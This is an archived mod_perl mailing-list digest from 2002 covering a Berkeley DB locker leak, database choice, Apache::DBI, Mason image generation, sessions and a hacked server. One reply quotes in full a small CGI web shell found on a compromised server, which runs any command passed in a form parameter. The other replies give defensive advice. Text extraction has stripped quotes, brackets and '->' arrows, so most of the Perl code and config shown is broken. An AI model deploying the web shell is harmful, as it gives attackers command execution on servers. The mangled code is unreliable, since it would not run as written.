On Thu, 21 Mar 2002, Perrin Harkins wrote:

 When you call the script, do you get segfaults in the error log?

Coming into this thread a little late, so sorry if you already said,
what version of Perl are you using?  I had problems with Devel::Dprof
and dprofpp on 5.7.1 which were fixed by upgrading to 5.7.2 although
Dprof itself didn't change at all.

73,
Ged.

Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Dan Wilga]

Hello,

I have run into a problem specific to Berkeley 4.0.14 that I hope you 
can help me to diagnose. There are enough other products involved 
that I'm not sure if it's DB's fault or mod_perl's. Here's the setup:

   Linux 7.2 i386
   perl 5.6.1
   apache 1.3.19 with mod_perl 1.25
   DB 4.0.14
   BerkeleyDB 0.18

I'm testing with the Perl script below, with the filename ending 
.mperl (which, in my configuration, causes it to run as a mod_perl 
registry script).

The problem: Under DB 4.0.14, five lockers get allocated, one during 
each iteration of the loop. The test program will show Current 
number of lockers and Maximum number of lockers so far both to be 
5. In a production environment, this behavior eventually leads to an 
error, because the maximum number of lockers is reached.

If I either use DB 3.x or even run this from the commandline 
(bypassing mod_perl) under DB 4 the problem goes away: only one 
locker is allocated per loop, and therefore the total number used 
does not increase unexpectedly.

I have already contacted Sleepycat (the makers of DB), but they 
cannot help much, since their experience with mod_perl is limited.

- TEST SCRIPT -

#!/usr/bin/perl

use strict;
use BerkeleyDB qw( DB_CREATE DB_INIT_MPOOL DB_INIT_CDB );

# Change me to something appropriate for your system
my $dir='/home/httpd/some/directory';

system( rm $dir/__db* $dir/TESTdb );

foreach( 1..5 ) {
my $env = open_env($dir);
my %hash;
my $db = open_db( TESTdb, \%hash, $env );
untie %hash;
undef $db;
undef $env;
}
print HTTP/1.1 200\nContent-type: text/plain\n\n;
print `db_stat -c -h $dir`;
print \n;

sub open_env {
my $env = new BerkeleyDB::Env(
-Flags=DB_INIT_MPOOL|DB_INIT_CDB|DB_CREATE,
-Home= $_[0],
);
die Could not create env: $! .$BerkeleyDB::Error. \n if !$env;
return $env;
}

sub open_db {
my( $file, $Rhash, $env ) = @_;
my $db_key = tie( %{$Rhash}, 'BerkeleyDB::Btree',
-Flags=DB_CREATE,
-Filename=$file,
-Env=$env );
die Can't open $file: $! .$BerkeleyDB::Error.\n if !$db_key;
return $db_key;
}


Dan Wilga [EMAIL PROTECTED]
Web Technology Specialist http://www.mtholyoke.edu
Mount Holyoke CollegeTel: 413-538-3027
South Hadley, MA  01075 I have a bold and cunning plan - Baldric

Re: Subroutines taking time to return..

[Ged Haywood]

Hi again,

On Thu, 21 Mar 2002, David Brown wrote:

 OK, I have it working now.

Guess I shold read ALL my mail before replying to any of it...

73,
Ged.

Re: modperl and SQL db select

[Dave Rolsky]

On Thu, 21 Mar 2002, Rafiq Ismail (ADMIN) wrote:

 Mysql:+we all start with it.
 +Bench marks much faster.
 +/-Can allow nested queries (subselects again) though this is a
  relatively new feature.

Eh?  Subselects aren't scheduled for implementation until 4.1.  The
current version is 4.0.2.

 +People say it's less relational.  Isn't really - but has fewer
  features (see above)

I'm not sure what less relational means.

 -less reliable under heavy load.

I'm not sure where you get that from either.  MySQL is used under some
very heavy loads (read the MySQL users list).


Wow, this thread is really bringing out the fiction!


/*==
www.urth.org
we await the New Sun
==*/

Re: Off topic question a little worried

[Ged Haywood]

Hi there,

On Thu, 21 Mar 2002, John Michael wrote:

 Any idea as to how it got on my server.

Nope.  There are a thousand ways it could have been done if your
server is not carefully secured.  Do waht Perrin said - take it
offline, it can't be trusted - and read the CERT stuff that you've
been pointed to by another useful reply.

The server probably has a dozen back-doors in it now so it would be
irresponsible to leave it on line.  Unless you *really* know what you
are doing from a security point of view (and without meaning to be
offensive it sounds vey much like you don't) you should wipe the discs
and reinstall the OS and server(s) from scratch.

Then do some serious reading about securing your server.  Don't run
any daemons you don't have to run, especially ftp and sendmail, if you
aren't sure of them.

73,
Ged.

Re: modperl and SQL db select

[Jay Thorne]

On March 21, 2002 01:05 pm, Dave Rolsky wrote:
 On Thu, 21 Mar 2002, Jay Thorne wrote:
  The first one I noted was that he assumes that a high performance app has
  several joins. I think everyone here who's developed a few db apps will
  tell you that joins are hugely costly and should be avoided for an
  application's most common cases.

 Actually, I've developed _more_ than a few DB apps and I'd tell you that
 joins are not only _not_ hugely costly, but can sometimes be a performance
 improvement.

 It really depends on a lot of factors including what RDBMS you are using,
 how many connections you have, ratio of reads to writes, how complicated
 the joins are.

 But a blanket statement like that is flat out wrong.

Okay, now I need an example. I've never seen a query on any db where a single 
table query was slower than a two table join. Of course, I'm biased here, 
since my knowledge of the more bizarre db's is limited. I've only seen things 
like sybase, oracle, mysql, postgres and mssql. 


-- 
Jay yohimbe Thorne  [EMAIL PROTECTED]
Mgr Sys  Tech, Userfriendly.org

Re: modperl and SQL db select

[Perrin Harkins]

Please, please, please KILL THIS THREAD!

Re: modperl and SQL db select

[Ged Haywood]

Hi all,

On Thu, 21 Mar 2002, Perrin Harkins wrote:

 
 Please, please, please KILL THIS THREAD!

I second that.  It's all been done before guys.

73,
Ged.

Re: modperl and SQL db select

[Tom Mornini]

On Thursday, March 21, 2002, at 01:05 PM, Dave Rolsky wrote:

 Further on, he was discussing threaded discussion forums and assumed a
 recursive query. While recursing the DATA is probably (though 
 provabably not
 always) necessary, there is no need to storm the db with that many 
 queries,
 since query setup time, queing, and results extraction have noticable 
 time
 penalties. Extracting the data with a single query and recursing it in 
 RAM is
 a much more db and cpu friendly idea.

 This I can agree on, though it is more a limitation of SQL, which 
 provides
 no meaningful way to do a recursive query.

Vanilla SQL, perhaps, but not Oracle's flavor!

CONNECT BY PRIOR :-)

--
-- Tom Mornini
-- eWingz Systems, Inc.
--
-- ICQ: 113526784, AOL: tmornini, Yahoo: tmornini, MSN: tmornini

Re: 0 being appended to non mod_perl scripts.

[Randal L. Schwartz]

 Mike == Mike Wille [EMAIL PROTECTED] writes:

Mike I am encountering a wierd problem where perl scripts running under a normal
Mike cgi-bin (ie no mod_perl) have a '0' appended to the output.

I've seen this happen when people mistakenly write:

print system foo;

instead of

print `foo`;

but of course they should have written:

system foo;

instead.

As to why it's not happening in an Apache::Registry script, I cannot
say.

-- 
Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095
[EMAIL PROTECTED] URL:http://www.stonehenge.com/merlyn/
Perl/Unix/security consulting, Technical writing, Comedy, etc. etc.
See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training!

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Perrin Harkins]

Dan Wilga wrote:
 If I either use DB 3.x or even run this from the commandline (bypassing 
 mod_perl) under DB 4 the problem goes away: only one locker is allocated 
 per loop, and therefore the total number used does not increase 
 unexpectedly.

This sort of begs the question: why not use DB 3.x?  Is there some new 
feature you need in DB 4?

It's been a little while since I messed with this stuff, but I don't 
think you need to tear down the Env each time.  I think you can just 
create it the first time and reuse it after that.  Maybe that will help.

(Ah, Mount Holyoke.  As a Five College alumn, I remember it well.)

- Perrin

Re: Off topic question a little worried

[Robert Landrum]

At 4:58 PM -0500 3/21/02, darren chamberlain wrote:
Another alternative is to replace it with something that appears
to do the same thing, but actually logs a ton of stuff from the
requestor.

Unless the entire site has already been backdoored.  If that is the 
case, then this would serve no purpose, as the intruder could just 
come in via the backdoor.

Any time a security breach takes place, the first action should 
always be to take the box offline and access the extent of the breach 
(multiple machines may be effected), backup the disk(s), and 
reformat.  Finally, restore only the trusted files (and only after 
reviewing them for backdoors).

It's the only way to be sure that you've eliminated the problem.

Rob

--
When I used a Mac, they laughed because I had no command prompt. When 
I used Linux, they laughed because I had no GUI.  

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Dan Wilga]

At 1:32 PM -0500 3/21/02, Perrin Harkins wrote:
Dan Wilga wrote:
If I either use DB 3.x or even run this from the commandline 
(bypassing mod_perl) under DB 4 the problem goes away: only one 
locker is allocated per loop, and therefore the total number used 
does not increase unexpectedly.

This sort of begs the question: why not use DB 3.x?  Is there some 
new feature you need in DB 4?

I'm having problems with minor DB corruption in the last release of 
3.x (3.3.11), so I wanted to try 4.

It's been a little while since I messed with this stuff, but I don't 
think you need to tear down the Env each time.  I think you can just 
create it the first time and reuse it after that.  Maybe that will 
help.

I tried that, believe me :-). I only did it this way in the test 
script to show that the problem occurs despite that bit of extra 
caution. (Even the undefs are probably not needed, but are there 
for clarity.)

What surprises me is that all I have to do to introduce the problem 
is run it under mod_perl. It acts normally when run from the 
commandline.

(Ah, Mount Holyoke.  As a Five College alumn, I remember it well.)

:-)


Dan Wilga [EMAIL PROTECTED]
Web Technology Specialist http://www.mtholyoke.edu
Mount Holyoke CollegeTel: 413-538-3027
South Hadley, MA  01075Seduced by the chocolate side of the Force

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Perrin Harkins]

Dan Wilga wrote:
 What surprises me is that all I have to do to introduce the problem is 
 run it under mod_perl. It acts normally when run from the commandline.

Well, let's see, what would be different...

Is it possible that the problem is concurrency from multiple mod_perl 
processes?  What happens when you run it with httpd -X ?

Could there be a permissions issue involved?

Are you sure you're only invoking the script once under mod_perl?  If 
you raise the number of repetitions, does the command-line version 
exhibit the problem?

I don't see any scoping issues in your script, but are you running it 
under Apache::Registry?  Maybe the nested subroutines that creates are 
causing problems.

- Perrin

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Aaron Ross]

 
 I'm testing with the Perl script below, with the filename ending 
 .mperl (which, in my configuration, causes it to run as a mod_perl 
 registry script).

 I would re-write it as a handler and see if Apache::Registry is partly
to blame.

 hth, aaron

Re: Off topic question a little worried

[lembark]

-- Perrin Harkins [EMAIL PROTECTED] on 03/21/02 17:07:27 -0500

 darren chamberlain wrote:
 Another alternative is to replace it with something that appears
 to do the same thing, but actually logs a ton of stuff from the
 requestor.
 
 You can't trust any part of compromised box, right down to the 'ls' command.
 Once you know someone has been able to run arbitrary commands on your
 machine, they could have installed ANYTHING.  They might have a rootkit, they
 might have replaced your ssh binary with something that mails passwords to
 them, they might be using your box as part of a DoS attack on someone else's
 site, they might be on your box running as root *right now*.  You don't even
 know how they got on the box in the first place.  Disconnect it.

You can usually trust read only media (e.g., CDR's placed
in a cdrom drive or mechanically write-locked floppy or 
mio discs). Booting a rescue cd or one you've burned
after the insatll and before putting the box on line can
allow you to check what's going on and at least back up the
more useful portions of the system config files. You might
also want to use rescue-cd util's to back up the logs and 
apache directories to try and track the schmuck to cracked
you.

Point is that even if you cannot trust anything at all
on your hard drives at this point you can still analyze
what's there and recover at least some of it.

enjoi.

--
Steven Lembark  2930 W. Palmer
Workhorse Computing  Chicago, IL 60647
   +1 800 762 1582

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Dan Wilga]

At 1:55 PM -0500 3/21/02, Perrin Harkins wrote:
Dan Wilga wrote:
What surprises me is that all I have to do to introduce the problem 
is run it under mod_perl. It acts normally when run from the 
commandline.

Well, let's see, what would be different...

Is it possible that the problem is concurrency from multiple 
mod_perl processes?  What happens when you run it with httpd -X ?

The same (bad) results.

Could there be a permissions issue involved?

Nope, all the files get deleted and re-created in the script (and 
they do get created correctly). Permissions also wouldn't explain why 
the same thing works in 3.x.

Are you sure you're only invoking the script once under mod_perl?

Yes, I'm doing it by a direct URL.

  If you raise the number of repetitions, does the command-line 
version exhibit the problem?

No, the commandline version never does. When run under mod_perl, the 
Current number of lockers reported by db_stat is always equal to 
the number of iterations, no matter how many are used.

I don't see any scoping issues in your script, but are you running 
it under Apache::Registry?  Maybe the nested subroutines that 
creates are causing problems.

Ack. Ptooey. I just renamed the file to end in .cgi and the problem 
persists. I even removed mod_perl from my configuration files, and it 
still fails. I thought I had tested the before, but I guess not.

This can only mean mod_perl isn't at fault. Sorry for the false 
alarm. I'll have to go back to Sleepycat with this new information.


Dan Wilga [EMAIL PROTECTED]
Web Technology Specialist http://www.mtholyoke.edu
Mount Holyoke CollegeTel: 413-538-3027
South Hadley, MA  01075   Who left the cake out in the rain?

Re: Apache::args vs Apache::Request speed

[mark warren bracher]

I didn't ever actually see a post with newer numbers, so here goes..

I tested the same 50 clients/5000 requests as stas' test in the guide. 
one pass with 2 uri params; another with 26.  naturally I ran it all on 
a server big (and quiescent) enough to handle the 50 concurrent 
requests.  I left out CGI since we already know it is slow.

/test/params and /test/args are mod_perl handlers (I don't use 
Apache::Registry for anything) ParamsTest and ArgsTest respectively. 
the code for both handlers and the relevant pieces of ab output are 
pasted in below.

   -
   name   query_length  | avtime completed failedrps
   -
   apache_args  25  |  33.77  5000  0   1481
   apache_request   25  |  33.17  5000  0   1507
   apache_args 337  |  43.51  5000  0   1141
   apache_request  337  |  45.31  5000  0   1103
   --
   Non-varying sub-test parameters:
   --
   concurrency : 50
   connections : 5000

so $apr-param is marginally faster than $r-args for the shorter query, 
marginally slower for the longer one.  I think this may be because we 
can return the full hash $r-args whereas we need to map over 
$apr-param to get a hash (so param gets called three times for the 
short query, 27 times for the larger one).  still, much closer numbers 
than the former test...

- mark

package ParamsTest;

use strict;

use Apache;
use Apache::Constants qw( OK );
use Apache::Request;

sub handler {
 my $r = Apache::Request-new( shift );
 $r-send_http_header( 'text/plain' );
 my %args = map { $_ = $r-param( $_ ) } $r-param();
 $r-print( join( \n,
  map { join( '',
  $_ , ' = ' , $args{$_}
) }
  keys %args
)
  );
 return OK;
}

1;

package ArgsTest;

use strict;

use Apache;
use Apache::Constants qw( OK );

sub handler {
 my $r = shift;
 $r-send_http_header( 'text/plain' );
 my %args = $r-args();
 $r-print( join( \n,
  map { join( '',
  $_ , ' = ' , $args{$_}
) }
  keys %args
)
  );
 return OK;
}

1;


Document Path:  /test/params?a=eeb=ee
Document Length:31 bytes

Concurrency Level:  50
Time taken for tests:   3.317 seconds
Complete requests:  5000
Failed requests:0
Broken pipe errors: 0
Total transferred:  883520 bytes
HTML transferred:   155620 bytes
Requests per second:1507.39 [#/sec] (mean)
Time per request:   33.17 [ms] (mean)
Time per request:   0.66 [ms] (mean, across all concurrent requests)
Transfer rate:  266.36 [Kbytes/sec] received

Connnection Times (ms)
   min  mean[+/-sd] median   max
Connect:0 51.9  516
Processing:14274.6 2750
Waiting:9274.7 2749
Total: 14323.7 3254


Document Path:  /test/args?a=eeb=ee
Document Length:31 bytes

Concurrency Level:  50
Time taken for tests:   3.377 seconds
Complete requests:  5000
Failed requests:0
Broken pipe errors: 0
Total transferred:  883168 bytes
HTML transferred:   18 bytes
Requests per second:1480.60 [#/sec] (mean)
Time per request:   33.77 [ms] (mean)
Time per request:   0.68 [ms] (mean, across all concurrent requests)
Transfer rate:  261.52 [Kbytes/sec] received

Connnection Times (ms)
   min  mean[+/-sd] median   max
Connect:0 51.8  518
Processing:12274.5 2863
Waiting:8274.5 2763
Total: 12323.7 3265


Document Path: 
/test/params?a=eeb=eec=eed=eee=eef=eeg=eeh=eei=eej=eek=eel=eem=een=eeo=eep=eeq=eer=ees=eet=eeu=eev=eew=eex=eey=eez=ee
Document Length:415 bytes

Concurrency Level:  50
Time taken for tests:   4.531 seconds
Complete requests:  5000
Failed requests:0
Broken pipe errors: 0
Total transferred:  2810640 bytes
HTML transferred:   2082885 bytes
Requests per second:1103.51 [#/sec] (mean)
Time per request:   45.31 [ms] (mean)
Time per request:   0.91 [ms] (mean, across all concurrent requests)
Transfer rate:  620.31 [Kbytes/sec] received

Connnection Times (ms)
   min  mean[+/-sd] median   max
Connect: 

Apache::DBI or What ?

[Eric Frazier]

Hi,

I was all happy and rolling along when I read this in the docs. 

With this limitation in mind, there are scenarios, where
   the usage of Apache::DBI is depreciated. Think about a
   heavy loaded Web-site where every user connects to the
   database with a unique userid. Every server would create
   many database handles each of which spawning a new backend
   process. In a short time this would kill the web server.

I will have many different users, users as in database users. So am I just
screwed and won't be able to keep connections open? 
Or maybe the idea would be to go ahead and let that happen, but timeout the
connection in 5 mintues or so? That way I wouldn't have open connectoins
from user bob from 5 hours ago still siting around. Or am I totaly not
getting it at all? 

I am using Postgress, I am wondering how big DBs deal with this sort of
thing. I am also wondering what the actual overhead is in starting the
connection and if there is anything that I could to to limit that without
validating a specific user. 

Last of all, I might not be posting this to the right place, but I hope so.
It seems to me there is a grey area when it comes to Apache modules when you
are using them with mod_perl. Or else I just don't know enough yet to see
there is not a grey area :) 

Thanks,


Eric 

http://www.kwinternet.com/eric
(250) 655 - 9513 (PST Time Zone)

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Dan Wilga]

At 2:03 PM -0500 3/21/02, Aaron Ross wrote:

  I'm testing with the Perl script below, with the filename ending
  .mperl (which, in my configuration, causes it to run as a mod_perl
  registry script).

  I would re-write it as a handler and see if Apache::Registry is partly
to blame.

Sorry, I figured out that the problem persists even when mod_perl is 
completely disabled, so the problem must lie in either Apache or 
Berkeley DB. (As a diagnostic, I think I'll try disabling 
mod_auth_db.* and mod_ssl, since they both use DB.)

Thanks for the quick responses, folks!


Dan Wilga [EMAIL PROTECTED]
Web Technology Specialist http://www.mtholyoke.edu
Mount Holyoke CollegeTel: 413-538-3027
South Hadley, MA  01075 I have a bold and cunning plan - Baldric

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Dan Wilga]

OK, I'm an idiot who can't read. I was reading the wrong part of 
db_stat's output when I thought that running it with the .cgi ending 
also caused the problem. Turns out it doesn't.

So I have not absolved mod_perl after all. It's definitely an 
interaction between it and DB 4.

This is one of those times I really wish I could go back and edit my 
posts :-). Anyone reading this thread will now be seriously confused.

So I'll try Aaron's suggestion of writing it as a handler. Any other 
suggestions are welcome.


Dan Wilga [EMAIL PROTECTED]
Web Technology Specialist http://www.mtholyoke.edu
Mount Holyoke CollegeTel: 413-538-3027
South Hadley, MA  01075 I have a bold and cunning plan - Baldric

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Dan Wilga]

At 2:03 PM -0500 3/21/02, Aaron Ross wrote:

  I'm testing with the Perl script below, with the filename ending
  .mperl (which, in my configuration, causes it to run as a mod_perl
  registry script).

  I would re-write it as a handler and see if Apache::Registry is partly
to blame.

I tried doing it as a handler, using the configuration below (and the 
appropriate changes in the source) and the problem persists. So it 
doesn't seem to be Registry's fault.

Location /dan
 SetHandler perl-script
 PerlHandler DanTest
/Location

 source code 

#!/usr/bin/perl

package DanTest;

use strict;
use BerkeleyDB qw( DB_CREATE DB_INIT_MPOOL DB_INIT_CDB );

my $dir='/home/httpd/some/path';

sub handler {
system( rm $dir/__db* $dir/TESTdb );

foreach( 1..5 ) {
my $env = open_env($dir);
my %hash;
my $db = open_db( TESTdb, \%hash, $env );
untie %hash;
undef $db;
undef $env;
}
print HTTP/1.1 200\nContent-type: text/plain\n\n;
print `db_stat -c -h $dir`;
print \n;
}

sub open_env {
my $env = new BerkeleyDB::Env(
-Flags=DB_INIT_MPOOL|DB_INIT_CDB|DB_CREATE,
-Home= $_[0],
);
die Could not create env: $! .$BerkeleyDB::Error. \n if !$env;
return $env;
}

sub open_db {
my( $file, $Rhash, $env ) = @_;
my $db_key = tie( %{$Rhash}, 'BerkeleyDB::Btree',
-Flags=DB_CREATE,
-Filename=$file,
-Env=$env );
die Can't open $file: $! .$BerkeleyDB::Error.\n if !$db_key;
return $db_key;
}

1;


Dan Wilga [EMAIL PROTECTED]
Web Technology Specialist http://www.mtholyoke.edu
Mount Holyoke CollegeTel: 413-538-3027
South Hadley, MA  01075Seduced by the chocolate side of the Force

Future versions

[Aaron Roberts]

Hi,
I noticed that your May be done list on www.apache-asp.org
mentions an interpreter for VBScript.  I have been asked to setup a
Linux based corporate website, though my developers insist on using
VBScript and ASP.

I realise that this is a bit of a time -wasting question, but how
certain is the May be done list of to dos? - should I wait for your
apache module to include VBScript support, or am I going to have to work
with something like Sun's Chilli ASP for apache/linux ?

Many thanks for your time,

Aaron 

Aaron Robertsmailto:[EMAIL PROTECTED]
Technical Support Engineer
Domicilium (IOM) Ltd.
32-34 Malew Street
Castletown
Isle of Man
IM9 1AF
Tel: 01624 825278
Fax: 01624 829525
http://www.domicilium.com 

Re: Apache::DBI or What ?

[Andrew Ho]

Hello,

EFI will have many different users, users as in database users. So am I
EFjust screwed and won't be able to keep connections open?

Do you mean users as in actual RDBMS level users? In other words, when you
say database users you mean different username/passwords used from, say,
a command-line SQL client?

If your answer is yes then indeed, this is exactly the situation the Guide
is talking about--you're screwed and probably shouldn't keep connections
open. You'll have to incur a connect on each HTTP request.

EFI am using Postgress, I am wondering how big DBs deal with this sort of
EFthing. I am also wondering what the actual overhead is in starting the
EFconnection and if there is anything that I could to to limit that
EFwithout validating a specific user.

In large DB projects where you expect high levels of concurrency I haven't
heard of anybody using RDBMS-level users for authentication purposes.

Humbly,

Andrew

--
Andrew Ho   http://www.tellme.com/   [EMAIL PROTECTED]
Engineer   [EMAIL PROTECTED]  Voice 650-930-9062
Tellme Networks, Inc.   1-800-555-TELLFax 650-930-9101
--

Re: Non-web use for Apache/mod_perl

[Bill McCabe]

Over the last year I've been slowly working on a similar system in my spare time
(of which I have none). To do systems monitoring and reporting I'm using
mod_perl on the front end and communicating with remote systems via XML::RPC.
The XML::RPC server on the remote system runs local command via perl wrappers.
These wrappers are now returning raw command output, but my next step is to have
them convert it first to XML and then return it, where it can be stored in a DB
(I use DB2) and/or processed by AxKit. I decided to go this way so I could
delegate the customization of the local wrappers to other admins, because our
site uses so many different platforms (AIX, Sun, linux, BSD, all stripes of
Windows, OS/2, AS/400, OS/390, MacOS 9, MacOS X, etc etc). So far I've only been
monitoring and reporting disk usage, just to get up and running.



Bill

Re: Future versions

[Ken Y. Clark]

On Wed, 20 Mar 2002, Aaron Roberts wrote:

 Date: Wed, 20 Mar 2002 13:34:46 -
 From: Aaron Roberts [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Subject: Future versions

 Hi,
   I noticed that your May be done list on www.apache-asp.org
 mentions an interpreter for VBScript.  I have been asked to setup a
 Linux based corporate website, though my developers insist on using
 VBScript and ASP.

 I realise that this is a bit of a time -wasting question, but how
 certain is the May be done list of to dos? - should I wait for your
 apache module to include VBScript support, or am I going to have to work
 with something like Sun's Chilli ASP for apache/linux ?

 Many thanks for your time,

   Aaron

 Aaron Robertsmailto:[EMAIL PROTECTED]
 Technical Support Engineer
 Domicilium (IOM) Ltd.
 32-34 Malew Street
 Castletown
 Isle of Man
 IM9 1AF
 Tel: 01624 825278
 Fax: 01624 829525
 http://www.domicilium.com

Aaron,

Your question is specific to Apache::ASP only, so it might be better
suited for their list.  Still, I've used Apache::ASP in the past (and
I've also had my dark days using M$'s ASP on IIS), so I might
conjecture that Joshua probably won't ever fully implement VBScript
(though I think I remember him talking about a VBScript-to-Perl
converter).  I shouldn't speak for Joshua, though.  He may be planning
to support VBScript.

I might point out, however, that if your requirements include a
Linux-based
website, then you're going to have troubles with these developers
[who] insist on using VBScript and ASP.  If they're not interested in
the enlightenment that comes from using Perl and Apache::ASP, then
you'll probably have to lay down the dough for IIS.

The short answer is probably Don't hold your breath for VBScript.  I
couldn't comment on Sun's product.  Sorry.  Try your question on
the Apache::ASP list:

http://www.apache-asp.org/support.html

ky

[MASON] Using GD for dynamic graphics

[Nicolai Schlenzig]

Hi

I would like to add some dynamic generated graphics to my site and find GD being the 
one to use. However I'm not sure _how_ to use it on my pages.

I use HTML::Mason for content management and I am very happy and truly amazed of the 
powers in Mason, but when I tried adding some GD it got me puzzled.

When I create a new GD::Image drawing whatever on it and trying to print it - it will 
be prepended to my html header for the page. I then tried to put it in $m-out to have 
in printed within Mason, but that simply printed the raw PNG in all its glory as text 
on screen.

I tried fiddeling with content_type, but I guess that wont work if I set this after I 
have already printed something on the page - hence the content_type will not even be 
effective for that page.

What I still miss doing/trying is making a seperate file/component which only job will 
be to make the PNG, but I don't really see what I would gain from that, because that 
will pretty much also just print a PNG within my HTML page.

Like:

html
head
/head
body
Some standard html text...
%perl
$m-content_type( image/png );
#my Mason/perl code for creating an image with GD.
my $image = GD::Image();
#put something on image... been using both clean GD synopsis and some home cooked 
small widgets.
print $image-png;
#or
$m-out( $image-png );
#or
$r-print( $image-png );
$m-content_type( text/html );
/%perl
Some more html text.
/body
/html

Very simplified, but I don't have my code in front of me - sorry. I would assume that 
content_type in only good for setting in the header, but I don't see how I can mix in 
this PNG then.

If GD could virtualle create a file I guess img src=% $image-png % would 
work... but that seems like a long shot when reading the man for GD :)

Any help/hints will be greatly appriciate. Maybe I just need to look harder for more 
ressources, but I've already spent a lot of time on something that looks quite simple 
- but haven't shown results yet.


Best regards

Nicolai Schlenzig
nicolai.schlenzig(at)got2get.net

Re: Off topic question a little worried

[Stas Bekman]

Chris Reinhardt wrote:

On Thu, 21 Mar 2002, John Michael wrote:



#!/usr/bin/perl
use CGI qw(:standard);
print header;
my $k=param(g);
my $a=param(s);
if ($a || $k) {
   $l=`$k 21`;
   print start_form,textarea(g,$k,1,50);
   print submit(sc);
   print end_form;
   print pre($l);
}
print $ENV{SERVER_NAME};


It executes arbitrary commands as whatever your httpds run as.

don't delete it, but add the -T flag

#!/usr/bin/perl -T

In addition for the hacker not being able to run anything and probably 
not understanding why, you will be able to check the logs to see what IP 
the script was called from and hopefully trace down the bugger.

Of course as Tom Brown has whispered to my ear, you simply need to run 
your code with PerlTaintCheck On, without modifying the script. or 
taking it off depending on what you want to achieve.




_
Stas Bekman JAm_pH  --   Just Another mod_perl Hacker
http://stason.org/  mod_perl Guide   http://perl.apache.org/guide
mailto:[EMAIL PROTECTED]  http://ticketmaster.com http://apacheweek.com
http://singlesheaven.com http://perl.apache.org http://perlmonth.com/

Re: modperl and SQL db select

[Marc Slagle]

 Is there any issue with using modperl with postgres vs mysql
 for a database driven website? Don't want to bark up the wrong
 tree in a mod_perl project only to discover I picked the wrong .db :-/

http://www.mysql.com/news/article-91.html

This was an interesting article, even though it didn't compare postgres to
the other databases being tested.  All of the mod_perl sites we have worked
on use MySQL, and we have never had any problems with it.  The newest
versions of MySQL (4.x) also add some functionality that might have made
MySQL look a bit less tempting for a developer to use in the past.

Marc Slagle
Secure Level
559 Liberty Hill, 2W
Cincinnati, Ohio, 45210
(513) 665 4931
http://www.securelevel.com

Re: [MASON] Using GD for dynamic graphics

[Dave Rolsky]

On Wed, 20 Mar 2002, Nicolai Schlenzig wrote:

 When I create a new GD::Image drawing whatever on it and trying to print
 it - it will be prepended to my html header for the page. I then tried
 to put it in $m-out to have in printed within Mason, but that simply
 printed the raw PNG in all its glory as text on screen.

 I tried fiddeling with content_type, but I guess that wont work if I set
 this after I have already printed something on the page - hence the
 content_type will not even be effective for that page.

 What I still miss doing/trying is making a seperate file/component which
 only job will be to make the PNG, but I don't really see what I would
 gain from that, because that will pretty much also just print a PNG
 within my HTML page.

First of all, there's a mason users list
(http://www.masonhq.com/resources/mailing_lists.html).

Second, you don't seem to understand how images in a web page works.
When your browser sees img src=foo it makes a _seperate_ request for
foo from the web server.

The image is not somehow magically inlined in the page and served with the
request for the page itself.

What you need is a seperate top-level Mason component that generates the
image.  Use this as the value for the src attribute like img
src=foo.comp?size=2.  Then make sure that foo.comp prints the correct
headers.

And yes, you need to use $m-out, not print (this is documented in the
Mason docs).


/*==
www.urth.org
we await the New Sun
==*/

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Aaron Ross]

   I'm testing with the Perl script below, with the filename ending
   .mperl (which, in my configuration, causes it to run as a mod_perl
   registry script).
 
   I would re-write it as a handler and see if Apache::Registry is partly
 to blame.
 
 I tried doing it as a handler, using the configuration below (and the 
 appropriate changes in the source) and the problem persists. So it 
 doesn't seem to be Registry's fault.

 Bummer.  I wish I had a machine to test this code on, but i won't until the
 end of next week. it's ugly, but you could use Devel::Peek to look at why
 garbage collection isn't working, maybe there is a circular reference in
 BerkeleyDB.

 Ugh.  Please keep me informed.

 -- Aaron

Session

[Murugan K]

Hi
   Thanks in advance for your reply.

How can i  maintain session informations  without cookie , hidden
variables  through forms  in Perl.

Is there any separate Apache module is available?

Regards
K.Murugan

Re: Session

[Per Einar Ellefsen]

At 22:46 21.03.2002 -0700, Murugan K wrote:
Hi
Thanks in advance for your reply.

How can i  maintain session informations  without cookie , hidden
variables  through forms  in Perl.

Is there any separate Apache module is available?


You should look at Apache::Session. There are different ways to keep 
session, but most go with atleast a cookie to keep the session ID, and then 
keeps all the information in a database or other storage method. Of course, 
the session ID can be passed along in whatever way you want, through the 
query string, or as a hidden form value.


-- 
Per Einar Ellefsen
[EMAIL PROTECTED]

Re: Berkeley DB 4.0.14 not releasing lockers under mod_perl

[Ed Grimm]

Does shutting down apache free up your locks?

(As an aside, I'm not sure I'll ever get over undef being proper closing
of a database connection; it seems so synonomous to free([23]).  I
expect something like $db-db_close() or something.)

Ed

On Thu, 21 Mar 2002, Dan Wilga wrote:

 At 2:03 PM -0500 3/21/02, Aaron Ross wrote:

  I'm testing with the Perl script below, with the filename ending
  .mperl (which, in my configuration, causes it to run as a mod_perl
  registry script).

  I would re-write it as a handler and see if Apache::Registry is partly
to blame.
 
 I tried doing it as a handler, using the configuration below (and the 
 appropriate changes in the source) and the problem persists. So it 
 doesn't seem to be Registry's fault.
 
 Location /dan
  SetHandler perl-script
  PerlHandler DanTest
 /Location
 
  source code 
 
 #!/usr/bin/perl
 
 package DanTest;
 
 use strict;
 use BerkeleyDB qw( DB_CREATE DB_INIT_MPOOL DB_INIT_CDB );
 
 my $dir='/home/httpd/some/path';
 
 sub handler {
   system( rm $dir/__db* $dir/TESTdb );
 
   foreach( 1..5 ) {
   my $env = open_env($dir);
   my %hash;
   my $db = open_db( TESTdb, \%hash, $env );
   untie %hash;
   undef $db;
   undef $env;
   }
   print HTTP/1.1 200\nContent-type: text/plain\n\n;
   print `db_stat -c -h $dir`;
   print \n;
 }
 
 sub open_env {
   my $env = new BerkeleyDB::Env(
   -Flags=DB_INIT_MPOOL|DB_INIT_CDB|DB_CREATE,
